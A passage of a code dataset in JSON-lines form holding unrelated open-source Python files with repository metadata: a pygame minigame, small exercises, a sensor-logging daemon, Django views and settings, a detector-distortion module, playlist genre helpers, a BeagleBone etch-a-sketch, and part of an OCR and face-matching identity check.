pygame.display.set_mode(WINDOW_SIZE)\n self.clock = pygame.time.Clock()\n self.font = pygame.font.SysFont(\"monospace\", 15, bold=True)\n\n self.countdown = Xbill.GAME_DURATION\n\n self.terminals.append(Terminal(640, 360))\n self.terminals.append(Terminal(740, 160))\n self.terminals.append(Terminal(840, 260))\n self.terminals.append(Terminal(540, 260))\n self.terminals.append(Terminal(440, 320))\n self.terminals.append(Terminal(340, 420))\n self.terminals.append(Terminal(790, 320))\n self.terminals.append(Terminal(256, 128))\n self.terminals.append(Terminal(1060, 425))\n self.terminals.append(Terminal(900, 550))\n\n pygame.display.set_caption(Xbill.GAME_NAME)\n pygame.mouse.set_visible(True)\n\n pygame.time.set_timer(TIMER_ID+1, Xbill.BILL_SPAWN_INTERVAL)\n\n def run(self, context):\n game_loop = True\n delta_accumulater = 0.0\n while game_loop:\n delta = self.clock.tick(self.UPDATE_FREQUENCY)\n delta_accumulater += delta\n if delta_accumulater >= self.FRAME_DELAY:\n self.render()\n delta_accumulater = 0.0\n game_loop = self.update(delta)\n pygame.display.flip()\n\n if self.countdown <= 0:\n context[\"{}.won\".format(self.GAME_NAME)] = \"true\"\n pygame.mouse.set_visible(False)\n\n # TODO: Wat to do here?\n \"\"\" \n if self.get_free_terminal() is not None:\n context[\"{}.won\".format(self.GAME_NAME)] = \"false\"\n \"\"\"\n\n def update(self, delta):\n if not self.handle_events(delta):\n return False\n\n for terminal in self.terminals:\n terminal.update(delta)\n\n for floating_text in self.floating_texts[:]:\n if not floating_text.update(delta):\n self.floating_texts.remove(floating_text)\n\n for bill in self.bills[:]:\n bill.update(delta)\n if bill.destroy:\n self.bills.remove(bill)\n\n self.countdown -= delta\n if self.countdown <= 0:\n logger.debug(\"you win\")\n pygame.mouse.set_visible(False)\n return False\n\n return True\n\n def render(self):\n self.screen.fill(pygame.Color(\"BLACK\"))\n\n for terminal in self.terminals:\n terminal.render(self.screen)\n\n for bill in self.bills:\n bill.render(self.screen)\n\n for floating_text in self.floating_texts:\n floating_text.render(self.screen)\n\n self.render_time(self.screen)\n\n def render_time(self, screen):\n label = self.font.render(\"Countdown: \"+str(self.countdown/1000), 1, pygame.Color(\"green\"))\n screen.blit(label, (640-24,16))\n\n def handle_events(self, delta):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit(0)\n if event.type == pygame.MOUSEBUTTONDOWN:\n return self.handle_mouse_click(event)\n if event.type == TIMER_ID+1: # create bill and send towards terminal\n self.bills.append(self.send_bill())\n free_terminal = self.get_free_terminal()\n if free_terminal is None:\n logger.debug(\"you lose\")\n return False\n self.bills[-1].goto_terminal(free_terminal)\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_s:\n self.countdown = 0\n\n return True\n\n def handle_mouse_click(self, event):\n for terminal in self.terminals:\n if terminal.rect.collidepoint(event.pos):\n if terminal.block_duration == 0 and not terminal.infected:\n terminal.prevent_patch()\n x, y = terminal.pos\n self.floating_texts.append(FloatingText(x-16, y-16, \"Blocked!\", self.font))\n return True\n\n def get_free_terminal(self):\n free_terminals = [terminal for terminal in self.terminals if not terminal.infected]\n if len(free_terminals) > 0:\n return random.choice(free_terminals)\n else:\n return None\n\n def send_bill(self):\n area = random.randint(1, 4)\n width = 16\n x, y = (0, 0)\n if area == 1: # LEFT\n x, y = (16, random.randint(width, 720-width*3))\n if area == 2: # RIGHT\n x, y = (1280-width*3, random.randint(width, 720-width*3))\n if area == 3: # TOP\n x, y = (random.randint(width, 1280-width*3), width)\n if area == 4: # BOTTOM\n x, y = (random.randint(width, 1280-width*3), 720-width*3)\n return Bill(x, y)\n\nclass Terminal(Sprite):\n SIZE = (32, 32)\n\n def __init__(self, x, y):\n super(Terminal, self).__init__()\n self.image = pygame.image.load(resources.get_image_asset(os.path.join(\"xbill\", \"terminal.png\"))).convert()\n self.pos = (x, y)\n self.rect = pygame.Rect(self.pos, Terminal.SIZE)\n self.block_duration = 0.0\n self.patch_progress = 0.0\n self.infected = False\n self.neighors = []\n\n def render(self, screen):\n screen.blit(self.image, self.rect)\n\n def update(self, delta):\n self.rect.topleft = self.pos\n self.block_duration = max(0, self.block_duration-delta)\n\n def prevent_patch(self):\n self.block_duration = 2 * 1000\n\nclass Bill(Sprite):\n SIZE = (32, 50)\n def __init__(self, x, y):\n super(Bill, self).__init__()\n self.image = pygame.image.load(resources.get_image_asset(os.path.join(\"xbill\", \"bill.png\"))).convert()\n self.pos = (x, y)\n self.animations = Group()\n self.rect = pygame.Rect(self.pos, Bill.SIZE)\n self.destroy = False\n self.image.set_colorkey((255, 0, 255))\n\n def render(self, screen):\n screen.blit(self.image, self.rect)\n\n def update(self, delta):\n self.animations.update(delta)\n\n def goto_terminal(self, terminal):\n x, y = terminal.pos\n x_anim = Animation(self.rect, centerx=x, duration=4000)\n y_anim = Animation(self.rect, centery=y, duration=4000)\n self.animations.add(x_anim)\n self.animations.add(y_anim)\n x_anim.schedule(partial(self.on_arrived_at_terminal, terminal), \"on finish\")\n\n def on_arrived_at_terminal(self, terminal):\n if terminal.block_duration == 0:\n terminal.infected = True\n terminal.image = pygame.image.load(resources.get_image_asset(os.path.join(\"xbill\", \"terminal_infected.png\"))).convert()\n self.destroy = True\n\nclass FloatingText(object):\n def __init__(self, x, y, label, font):\n self.pos = (x, y)\n self.label = font.render(label, 1, pygame.Color(\"white\"))\n self.life_time = 2 * 1000\n\n def render(self, screen):\n screen.blit(self.label, self.pos)\n\n def update(self, delta):\n self.life_time -= delta\n x, y = self.pos\n self.pos = (x, y-0.04)\n if self.life_time <= 0:\n return False\n return True\n","repo_name":"bitcraft/pyweek25","sub_path":"patchworkorange/minigames/xbill/Xbill.py","file_name":"Xbill.py","file_ext":"py","file_size_in_byte":7954,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"13722256899","text":"# Q10 Write a Python program to find minimum and maximum value in a list.\n\ndef find_min_max(list):\n min_value = list[0]\n max_value = list[0]\n for value in list:\n if value < min_value:\n min_value = value\n if value > max_value:\n max_value = value\n return (min_value, max_value)\n\nlist = []\nn = int(input(\"Enter the number of elements in the list: \"))\nfor i in range(n):\n element = int(input(\"Enter element {}: \".format(i + 1)))\n list.append(element)\n\nmin_value, max_value = find_min_max(list)\nprint(\"The minimum value is:\", min_value)\nprint(\"The maximum value is:\", max_value)","repo_name":"arnavjain2710/DBMS-LAB-WORK","sub_path":"LAB 3/p10.py","file_name":"p10.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15053930459","text":"H,W = (int(x) for x in input().split())\r\nfig = [['#' for x in range(W+2)]]\r\norg = [['.' for x in range(W+2)] for y in range(H+2)]\r\narea = [[-1,-1],[-1,0],[-1,1],\r\n [0,-1],[0,1],\r\n [1,-1],[1,0],[1,1]]\r\npos = True\r\n\r\nfor i in range(H):\r\n S = list(input())\r\n fig.append(['#'] + S + ['#'])\r\n\r\nfig += [['#' for x in range(W+2)]]\r\n\r\nfor i in range(1,H+1):\r\n for j in range(1,W+1):\r\n if fig[i][j] == '#':\r\n if all((fig[i+k[0]][j+k[1]] == '#' for k in area)):\r\n org[i][j] = '#'\r\n else:\r\n org[i][j] = '?'\r\n\r\nfor i in range(1,H+1):\r\n for j in range(1,W+1):\r\n if org[i][j] == '?':\r\n if all((org[i+k[0]][j+k[1]] != '#' for k in area)):\r\n pos = False\r\n break\r\n org[i][j] = '.'\r\n else:\r\n continue\r\n break\r\n\r\nif pos:\r\n print('possible')\r\n for i in range(1,H+1):\r\n for j in range(1,W+1):\r\n print(org[i][j], end='')\r\n print()\r\nelse:\r\n print('impossible')","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/abc039/D/4877413.py","file_name":"4877413.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"34635459964","text":"import logging\nimport signal\nimport sys\nimport time\nfrom datetime import datetime, timedelta\nfrom queue import Queue\n\nimport framework.settings\nimport serialIO.streamDecoder\nfrom daemon.DataBaseConnector import DataBaseConnector as Dbcon\nfrom daemon.HtmlConfigStructure import HtmlConfig\nfrom daemon.HtmlCreator import HtmlCreator as HtmlCreator\nfrom daemon.PlotCreator import PlotCreator as PlotCreator\nfrom serialIO.serialThread import Worker\nfrom serialIO.streamDecoder import StreamDecoder as StreamDecoder\n\n\n# Desiderata:\n# Ungültige Sensordaten kennzeichnen und nicht mehr in die db schieben\n# (ticks checken und wenn zu alt aus liste löschen)\n\n\n# ctrl+c signal handler\ndef signal_handler(sig, frame):\n print('Exit requested, waiting for all threads to exit.')\n ThetaMonDaemon.exit_requested = True\n\n\nclass ThetaMonDaemon:\n exit_requested = False\n update_db_freq = 5 # [min]\n\n # update_db_freq = 1 # [min]\n\n def __init__(self, settings_in: framework.settings.AppSettings):\n self.settings = settings_in\n self.serial_queue = Queue()\n self.txt_queue = Queue()\n self.bin_queue = Queue()\n self.stream_decoder = StreamDecoder(self.txt_queue, self.bin_queue)\n self.sensor_val_dic = {} # { sensorId, MeasurementType }\n self.statistic_dic = {} # { sensorId, RadioStatisticsType }\n self.html_conf = HtmlConfig(self.settings)\n self.worker = None\n signal.signal(signal.SIGINT, signal_handler)\n self.db = Dbcon(self.settings)\n self.next_time = \\\n datetime.now() + timedelta(hours=0, minutes=self.update_db_freq)\n self.plot_creator = PlotCreator(self.settings, self.db, self.html_conf)\n self.html_creator = HtmlCreator(self.settings, self.db, self.html_conf)\n self.entry()\n\n def entry(self):\n device = self.settings.get(\"common\", \"serial_port\")\n self.worker = Worker(self.serial_queue, device, 115200, 0.5)\n self.worker.start()\n self.db.connect()\n self.create_html() # initial creation\n\n while 1:\n if self.exit_requested:\n self.worker.request_exit()\n self.db.close()\n sys.exit(0)\n # consume serial queues\n self.update_queues()\n self.bin_queue_to_struct()\n if datetime.now() >= self.next_time:\n self.next_time = \\\n datetime.now() + timedelta(hours=0, minutes=self.update_db_freq)\n self.push_dicts_to_db()\n self.create_html()\n time.sleep(1.0) # we could sleep for update_db_freq\n\n def update_queues(self):\n data = None\n for j in range(self.serial_queue.qsize() - 1):\n data = self.serial_queue.get(block=True, timeout=0.2)\n if data is None:\n return\n self.stream_decoder.proc_serial_stream(data)\n\n def bin_queue_to_struct(self):\n while self.bin_queue.qsize() > 0:\n bin_msg = self.bin_queue.get(block=True, timeout=None)\n if bin_msg.msgClass == serialIO.streamDecoder.MEASUREMENT_ENUM:\n self.sensor_val_dic[bin_msg.sensorIdHash] = bin_msg\n elif bin_msg.msgClass == serialIO.streamDecoder.STATISTICS_ENUM:\n self.statistic_dic[bin_msg.stationId] = bin_msg\n self.bin_queue.task_done()\n\n def push_dicts_to_db(self):\n sens_dat_count = 0\n stat_dat_count = 0\n for msmnt in self.sensor_val_dic.values():\n self.db.update_sensordata(msmnt)\n sens_dat_count += 1\n for stats in self.statistic_dic.values():\n self.db.update_stationdata_tbl(stats)\n stat_dat_count += 1\n self.statistic_dic.clear()\n self.sensor_val_dic.clear()\n if sens_dat_count > 0:\n logging.getLogger().info(\n \"Updated sensordata with {} items\".format(sens_dat_count))\n if stat_dat_count > 0:\n logging.getLogger().info(\n \"Updated stationdata with {} items.\".format(stat_dat_count))\n\n def create_html(self):\n start = time.time()\n self.plot_creator.create_plots()\n end = time.time()\n logging.getLogger().info(\"Time needed to create plots: {}\"\n .format(end - start))\n self.html_creator.create_html_pages()\n\n","repo_name":"Linoprit/ThetaMonitorNetwork","sub_path":"SBC/ThetaMonitorSerial/daemon/ThetaMonDaemon.py","file_name":"ThetaMonDaemon.py","file_ext":"py","file_size_in_byte":4370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"7035726591","text":"import time\nimport numpy as np\n\nimport ex_sum_py, ex_fib_py, ex_sort_py\nimport ex_sum_cy, ex_fib_cy, ex_sort_cy\n\n\ndef time_function(f, x):\n t = time.time()\n f(x)\n return time.time() - t\n\n\nif __name__ == '__main__':\n t_py = time_function(ex_sum_py.get_sum, x=1_000_000)\n t_cy = time_function(ex_sum_cy.get_sum, x=1_000_000)\n print(f'ex_sum: t_py={t_py:.6f}, t_cy={t_cy:.6f}')\n\n t_py = time_function(ex_fib_py.get_series, x=10_000)\n t_cy = time_function(ex_fib_cy.get_series, x=10_000)\n print(f'ex_fib: t_py={t_py:.6f}, t_cy={t_cy:.6f}')\n\n array = np.random.randint(100, size=1_000, dtype=np.int32)\n t_py = time_function(ex_sort_py.sort, x=array)\n t_cy = time_function(ex_sort_cy.sort, x=array)\n print(f'ex_sort: t_py={t_py:.6f}, t_cy={t_cy:.6f}')","repo_name":"suhren/cython","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"11749026138","text":"from django.shortcuts import render, redirect\nfrom linkworld.models import Post, Comment, Vote\nfrom django.shortcuts import get_object_or_404, resolve_url\nfrom linkworld.forms import PostForm, CommentForm\nfrom django.contrib.auth.decorators import login_required\nfrom django.conf import settings\nfrom django.db.models import Count\nfrom django.contrib import messages\n\n\ndef index(request):\n posts = Post.objects.annotate(vote_counts=Count(\n 'votes')).order_by(\"-vote_counts\", \"-date\")\n comments = Comment.objects.all().order_by(\"-date\")\n return render(request, 'index.html', {'posts': posts, 'comments': comments,\n })\n\n\ndef sort_by_date(request):\n posts = Post.objects.order_by(\"-date\")\n return render(request, 'index.html', {'posts': posts,\n })\n\n\ndef sort_by_likes(request):\n posts = Post.objects.annotate(vote_counts=Count(\n 'votes')).order_by(\"-vote_counts\", \"-date\")\n\n return render(request, 'index.html', {'posts': posts,\n })\n\n\ndef post_detail(request, slug):\n\n post = Post.objects.get(slug=slug)\n\n return render(request, 'posts/post_detail.html', {\n 'post': post,\n\n })\n\n\n@login_required\ndef new_post(request):\n\n form = PostForm(request.POST)\n if request.method == \"POST\":\n if form.is_valid():\n new_post = form.save(commit=False)\n new_post.author = request.user\n new_post.save()\n messages.success(request, 'Your post is up on the site!')\n return redirect('home')\n else:\n form = PostForm()\n\n return render(request, 'posts/new_post.html', {'form': form})\n\n\n@login_required\ndef delete_new_post(request):\n if request.POST.get('pk'):\n post = get_object_or_404(Post, pk=request.POST.get('pk'))\n if post.author == request.user:\n post.delete()\n messages.success(request, 'Your post has been deleted.')\n else:\n messages.warning(\n request, 'Sorry you are not authorized to delete this post')\n\n return redirect('home')\n\n\n@login_required\ndef comment_on_post(request, slug):\n post = get_object_or_404(Post, slug=slug)\n if request.method == \"POST\":\n form = CommentForm(request.POST)\n if form.is_valid():\n comment = form.save(commit=False)\n comment.post = post\n comment.commenter = request.user\n comment.save()\n messages.success(\n request, 'Great, thanks for commenting! Check it out on the post!')\n return redirect('post_detail', slug=post.slug)\n else:\n messages.warning(\n request, 'Sorry something went wrong! Please submit again!')\n else:\n form = CommentForm()\n return render(request, 'posts/comment_on_post.html', {'form': form})\n\n\n@login_required\ndef delete_comment(request):\n\n if request.POST.get('pk'):\n comment = get_object_or_404(Comment, pk=request.POST.get('pk'))\n post = comment.post\n if comment.commenter == request.user:\n comment.delete()\n messages.success(request, 'Your comment has been deleted.')\n else:\n messages.warning(request, 'Sorry you are not authorized to delete this comment'\n )\n return redirect('post_detail', slug=post.slug)\n\n\n@login_required\ndef upvote(request, slug):\n\n post = get_object_or_404(Post, slug=slug)\n if request.method == \"POST\":\n if not Vote.objects.filter(post=post, user=request.user):\n Vote.objects.create(post=post, user=request.user)\n messages.success(request, 'Thanks for liking!')\n else:\n messages.info(request, 'You have already liked this post.')\n return redirect(('{}#' + post.slug).format(resolve_url('home')))\n","repo_name":"momentum-cohort-2018-10/w5-apile-sow-awesome","sub_path":"linkworld/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13451669614","text":"from my_personal_website.common import *\nimport os\nimport django_heroku\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = False\n\n\n\nSECRET_KEY = os.environ['SECRET_KEY']\n\n#update this to be heroku\nALLOWED_HOSTS = ['*', '.herokuapp.com']\n\n\n# PROJECT_ROOT = os.path.dirname(os.path.abspath(__file__))\n# STATIC_URL = '/static/'\n# STATIC_ROOT = \"andrew-lin.herokuapp.com/static/\"\n\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\nSTATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')\nSTATIC_URL = '/static/'\nSTATICFILES_DIRS = (\n os.path.join(BASE_DIR, 'website/static'),\n)\n\n# django_heroku.settings(locals())","repo_name":"arobertlin/PersonalWebsite","sub_path":"my_personal_website/production_settings.py","file_name":"production_settings.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43877530624","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jan 21 15:07:34 2021\n\n@author: Joel V. Bernier\n\"\"\"\nimport numpy as np\n\nfrom hexrd import constants\nfrom hexrd.constants import USE_NUMBA\nif USE_NUMBA:\n import numba\n\nfrom .distortionabc import DistortionABC\nfrom .registry import _RegisterDistortionClass\n\n\nclass Dexela_2923(DistortionABC, metaclass=_RegisterDistortionClass):\n\n maptype = \"Dexela_2923\"\n\n def __init__(self, params, **kwargs):\n self._params = np.asarray(params, dtype=float).flatten()\n\n @property\n def params(self):\n return self._params\n\n @params.setter\n def params(self, x):\n assert len(x) == 8, \"parameter list must have len of 8\"\n self._params = np.asarray(x, dtype=float).flatten()\n\n @property\n def is_trivial(self):\n return np.all(self.params == 0)\n\n def apply(self, xy_in):\n if self.is_trivial:\n return xy_in\n else:\n xy_out = np.empty_like(xy_in)\n _dexela_2923_distortion(\n xy_out, xy_in, np.asarray(self.params)\n )\n return xy_out\n\n def apply_inverse(self, xy_in):\n if self.is_trivial:\n return xy_in\n else:\n xy_out = np.empty_like(xy_in)\n _dexela_2923_inverse_distortion(\n xy_out, xy_in, np.asarray(self.params)\n )\n return xy_out\n\n\ndef _find_quadrant(xy_in):\n quad_label = np.zeros(len(xy_in), dtype=int)\n in_2_or_3 = xy_in[:, 0] < 0.\n in_1_or_4 = ~in_2_or_3\n in_3_or_4 = xy_in[:, 1] < 0.\n in_1_or_2 = ~in_3_or_4\n quad_label[np.logical_and(in_1_or_4, in_1_or_2)] = 1\n quad_label[np.logical_and(in_2_or_3, in_1_or_2)] = 2\n quad_label[np.logical_and(in_2_or_3, in_3_or_4)] = 3\n quad_label[np.logical_and(in_1_or_4, in_3_or_4)] = 4\n return quad_label\n\n\nif USE_NUMBA:\n @numba.njit(nogil=True, cache=True)\n def _dexela_2923_distortion(out_, in_, params):\n for el in range(len(in_)):\n xi, yi = in_[el, :]\n if xi < 0.:\n if yi < 0.:\n # 3rd quadrant\n out_[el, :] = in_[el, :] + params[4:6]\n else:\n # 2nd quadrant\n out_[el, :] = in_[el, :] + params[2:4]\n else:\n if yi < 0.:\n # 4th quadrant\n out_[el, :] = in_[el, :] + params[6:8]\n else:\n # 1st quadrant\n out_[el, :] = in_[el, :] + params[0:2]\n\n @numba.njit(nogil=True, cache=True)\n def _dexela_2923_inverse_distortion(out_, in_, params):\n for el in range(len(in_)):\n xi, yi = in_[el, :]\n if xi < 0.:\n if yi < 0.:\n # 3rd quadrant\n out_[el, :] = in_[el, :] - params[4:6]\n else:\n # 2nd quadrant\n out_[el, :] = in_[el, :] - params[2:4]\n else:\n if yi < 0.:\n # 4th quadrant\n out_[el, :] = in_[el, :] - params[6:8]\n else:\n # 1st quadrant\n out_[el, :] = in_[el, :] - params[0:2]\nelse:\n def _dexela_2923_distortion(out_, in_, params):\n # find quadrant\n ql = _find_quadrant(in_)\n ql1 = ql == 1\n ql2 = ql == 2\n ql3 = ql == 3\n ql4 = ql == 4\n out_[ql1, :] = in_[ql1] + np.tile(params[0:2], (sum(ql1), 1))\n out_[ql2, :] = in_[ql2] + np.tile(params[2:4], (sum(ql2), 1))\n out_[ql3, :] = in_[ql3] + np.tile(params[4:6], (sum(ql3), 1))\n out_[ql4, :] = in_[ql4] + np.tile(params[6:8], (sum(ql4), 1))\n return\n\n def _dexela_2923_inverse_distortion(out_, in_, params):\n ql = _find_quadrant(in_)\n ql1 = ql == 1\n ql2 = ql == 2\n ql3 = ql == 3\n ql4 = ql == 4\n out_[ql1, :] = in_[ql1] - np.tile(params[0:2], (sum(ql1), 1))\n out_[ql2, :] = in_[ql2] - np.tile(params[2:4], (sum(ql2), 1))\n out_[ql3, :] = in_[ql3] - np.tile(params[4:6], (sum(ql3), 1))\n out_[ql4, :] = in_[ql4] - np.tile(params[6:8], (sum(ql4), 1))\n return\n\n\n\ndef test_disortion():\n pts = np.random.randn(16, 2)\n qi = _find_quadrant(pts)\n\n # test trivial\n params = np.zeros(8)\n dc = Dexela_2923(params)\n if not np.all(dc.apply(pts) - pts == 0.):\n raise RuntimeError(\"distortion apply failed!\")\n if not np.all(dc.apply_inverse(pts) - pts == 0.):\n raise RuntimeError(\"distortion apply_inverse failed!\")\n\n # test non-trivial\n params = np.random.randn(8)\n dc = Dexela_2923(params)\n ptile = np.vstack([params.reshape(4, 2)[j - 1, :] for j in qi])\n result = dc.apply(pts) - pts\n result_inv = dc.apply_inverse(pts) - pts\n if not np.all(abs(result - ptile) <= constants.epsf):\n raise RuntimeError(\"distortion apply failed!\")\n if not np.all(abs(result_inv + ptile) <= constants.epsf):\n raise RuntimeError(\"distortion apply_inverse failed!\")\n return True\n","repo_name":"HEXRD/hexrd","sub_path":"hexrd/distortion/dexela_2923.py","file_name":"dexela_2923.py","file_ext":"py","file_size_in_byte":5046,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"72"} +{"seq_id":"23772572941","text":"def get_playlist_artists(playlist_items_list):\n # 플레이리스트가 갖고있는 곡들의 json 데이터 배열을 입력하면 해당 플리의 아티스트 리스트를 리턴\n appear_artists = []\n \n for d in playlist_items_list:\n for artist in d['track']['artists']:\n appear_artists.append(artist['name'])\n \n #appear_artists = list(set(appear_artists))\n return appear_artists\n\ndef get_artist_genres(artist_name, origin_data):\n # 아티스트 이름과 원본 데이터를 입력하면 장르를 출력\n for d in origin_data:\n if d['artist_name'] == artist_name:\n if 'genres' in d:\n return d['genres']\n else: return []\n\ndef get_playlist_genres(appear_artists, origin_data):\n # 플레이리스트가 갖고있는 곡들의 아티스트 배열을 입력하면 해당 플리의 장르 리스트를 리턴\n genre_list = []\n for artist in appear_artists:\n genres = get_artist_genres(artist, origin_data)\n if genres:\n for g in genres:\n genre_list.append(g)\n\n return genre_list\n\ndef genre_counter(genre_list):\n # 장르가 등장한 빈도가 담긴 리스트를 출력\n genres = list(set(genre_list)) # genres는 중복을 제거한 리스트\n genre_count = []\n \n for g in genres:\n genre_count.append([g, genre_list.count(g)])\n \n return genre_count","repo_name":"JoMars0722/capstone2","sub_path":"backend/playlist_artists_genres.py","file_name":"playlist_artists_genres.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35644349940","text":"#!/usr/bin/env python3\n\"\"\"\nMade by Brendan Mulholland\nECE 434- HW #3\n\"\"\"\n\nfrom Adafruit_BBIO.Encoder import RotaryEncoder, eQEP2, eQEP1\nimport time\nimport smbus\n\n\n\n\ndef clearBoard():\n global board\n global playerX\n global playerY\n \n board = [ [0] * 8 for _ in range(8)]\n board[playerX][playerY] = 1\n \n displayBoard()\n \n \ndef displayBoard():\n \n global VertMatrix\n global red\n global matrix\n \n PosMatrix = [0x00,0x02,0x04,0x06,0x08,0x0A,0x0C,0x0E]\n \n green = [0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00]\n \n for i in range(8):\n for j in range(8):\n green[i] += board[i][j] * VertMatrix[j]\n \n for i in range(8):\n bus.write_i2c_block_data(matrix,PosMatrix[i],[green[i],red[i]])\n\n\n \ndef clamp(n, minn, maxn):\n return max(min(maxn, n), minn) \n\n\ndef main():\n \n global playerX\n global playerY\n global board\n global encoder1\n global encoder2\n global red\n global VertMatrix\n \n vertPos = 0\n horiPos = 0\n \n while True:\n time.sleep(.5)\n \n \n oldPlayerX = playerX\n oldPlayerY = playerY\n \n \n temp = bus.read_byte_data(address, 0)\n \n if(temp >= 26):\n clearBoard()\n \n \n if(encoder1.position < horiPos):\n playerX += 1\n elif(encoder1.position > horiPos):\n playerX += -1\n elif(encoder2.position < vertPos):\n playerY += 1\n elif(encoder2.position > vertPos):\n playerY += -1\n \n \n horiPos = encoder1.position\n vertPos = encoder2.position\n \n playerX = clamp(playerX,0,7)\n playerY = clamp(playerY,0,7)\n \n \n \n \n red[oldPlayerX] = red[oldPlayerX] - VertMatrix[oldPlayerY]\n red[playerX] = red[playerX] + VertMatrix[playerY]\n \n if(oldPlayerX != playerX or oldPlayerY != playerY):\n board[playerX][playerY] = 1\n \n \n displayBoard()\n \n \n\n \n\n\nif __name__ == \"__main__\":\n \"\"\" This is executed when run from the command line \"\"\"\n #This is the size of the board and the init player location\n \n \n\n playerX = 4\n playerY = 4\n \n\n \n bus = smbus.SMBus(2)\n address = 0x48\n matrix = 0x70 # Use address 0x70\n \n bus.write_byte_data(matrix, 0x21, 0) # Start oscillator (p10)\n bus.write_byte_data(matrix, 0x81, 0) # Disp on, blink off (p11)\n bus.write_byte_data(matrix, 0xe7, 0) # Full brightness (page 15)\n \n \n \n \n \n VertMatrix = [0x01,0x02,0x04,0x08,0x10,0x20,0x40,0x80]\n \n \n board = 0\n \n #green = [0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00]\n red = [0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00]\n \n \n #greenboard = [ [0] * 8 for _ in range(8)]\n \n\n \n #This initialized the board to null and then adds the player's location\n clearBoard()\n \n #This sets up the encoders to zero\n encoder1 = RotaryEncoder(eQEP1)\n encoder2 = RotaryEncoder(eQEP2)\n encoder1.setAbsolute()\n encoder2.setAbsolute()\n encoder1.enable()\n encoder2.enable()\n \n red[playerX] = red[playerX] + VertMatrix[playerY]\n board[playerX][playerY] = 1\n \n main()\n","repo_name":"BrendanTB5/Embeded-Linux","sub_path":"hw03/etchasketch.py","file_name":"etchasketch.py","file_ext":"py","file_size_in_byte":3286,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"32954395576","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport base64\nimport cv2\nimport datetime\n\nfrom mocr import face_detection\nfrom mocr import TextRecognizer\nfrom nerd import ner\n\nfrom facereg import face_encoder, recognize_faces\n\nfrom graphvl import crud\nfrom graphvl.db.session import db_session\nfrom graphvl.models.image import ImageCreate, ImageType\nfrom graphvl.db_models.models import User\n\nfrom re import search\nfrom typing import List, Tuple, Dict\n\n\neast_path = (\n os.getcwd()\n + \"/graphvl\"\n + \"/\"\n + \"text_detection_model/frozen_east_text_detection.pb\"\n)\n\n\ndef create_image_file(user_id: str, image_type: ImageType) -> Tuple[str, str]:\n image = crud.image.get(db_session, user_id=user_id, image_type=ImageType.identity)\n if image:\n photo_data = base64.b64decode(image.image_str)\n\n if image_type == ImageType.identity:\n path = \"identity/\"\n else:\n path = \"profile/\"\n\n directory = os.getcwd() + \"/testsets/\" + path + user_id + \"/\"\n if not os.path.exists(directory):\n os.makedirs(directory)\n file_path = directory + \"image\" + \".jpg\"\n with open(file_path, \"wb\") as f:\n f.write(photo_data)\n\n # detect face from identity image\n face_image_path = None\n if image_type == ImageType.identity:\n face_image = face_detection.detect_face(file_path)\n face_directory = os.getcwd() + \"/testsets/\" + \"face/\" + user_id + \"/\"\n if not os.path.exists(face_directory):\n os.makedirs(face_directory)\n face_image_path = face_directory + \"image.jpg\"\n cv2.imwrite(face_image_path, face_image)\n return (file_path, face_image_path)\n else:\n return (None, None)\n\n\ndef get_texts(user_id: str) -> str:\n image_path = (\n os.getcwd() + \"/testsets/\" + \"identity\" + \"/\" + user_id + \"/\" + \"image.jpg\"\n )\n text_recognizer = TextRecognizer(image_path, east_path)\n (image, _, _) = text_recognizer.load_image()\n (resized_image, ratio_height, ratio_width, _, _) = text_recognizer.resize_image(\n image, 320, 320\n )\n (scores, geometry) = text_recognizer.geometry_score(east_path, resized_image)\n boxes = text_recognizer.boxes(scores, geometry)\n results = text_recognizer.get_results(boxes, image, ratio_height, ratio_width)\n if results:\n texts = \"\"\n for text_bounding_box in results:\n text = text_bounding_box[1]\n texts += text + \" \"\n return texts\n return \"\"\n\n\ndef create_user_text_label(user: User) -> Dict:\n user_text_label = {\n \"PERSON\": [user.name, user.surname],\n \"DATE\": user.date_of_birth,\n \"GPE\": user.country,\n }\n return user_text_label\n\n\ndef get_doc(texts: str, language: str) -> List[Tuple[str, str]]:\n try:\n doc = ner.name(texts, language=language)\n text_label = [(X.text, X.label_) for X in doc]\n return text_label\n except:\n return None\n\n\ndef point_on_texts(text: str, value: str) -> float:\n if isinstance(value, datetime.date):\n value = value.strftime(\"%d/%m/%Y\")\n\n val_len = len(value)\n text_len = len(text)\n if text_len > val_len:\n match = search(value, text)\n else:\n match = search(text, value)\n point = 0.0\n if match:\n (start, end) = match.span()\n point = float(((1.0 * (end - start)) / val_len) / 4)\n return point\n\n\ndef validate_text_label(text_label: List, user_text_label: str) -> float:\n result = 0\n for (text, label) in text_label:\n if label in user_text_label:\n value = user_text_label[label]\n # check for name and surname\n if isinstance(value, 